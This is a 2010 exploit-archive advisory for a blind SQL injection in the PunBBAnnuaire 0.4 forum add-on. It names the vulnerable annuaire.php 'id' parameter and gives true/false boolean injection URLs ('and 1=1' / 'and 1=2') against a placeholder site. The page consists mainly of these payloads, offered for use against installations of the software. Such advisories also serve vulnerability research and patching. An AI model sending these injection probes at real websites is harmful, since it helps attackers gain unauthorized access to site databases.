[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability
# Published : 2010-02-17
# Author : Metropolis
# Previous Title : Erotik Auktionshaus news.php SQL Injection Vulnerability
# Next Title : Pogodny CMS SQL Injection Vulnerability
PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability
========================================================
####################################################################
.:. Author : Metropolis
.:. Home : http://xrayoptics.by.ru/
.:. Script : PunBBAnnuaire
.:. Version : 0.4
.:. Download Script: http://www.punres.org/download.php?id=1737
.:. Bug Type : Blind Sql Injection
####################################################################
===[ Exploit ]===
/annuaire.php?action=site&id=1[ Blind SQL INJECTION ]
www.site.com/forum/annuaire.php?action=site&id=1 and 1=1 <-- true
www.site.com/forum/annuaire.php?action=site&id=1 and 1=2 <-- false
####################################################################
Vive la France !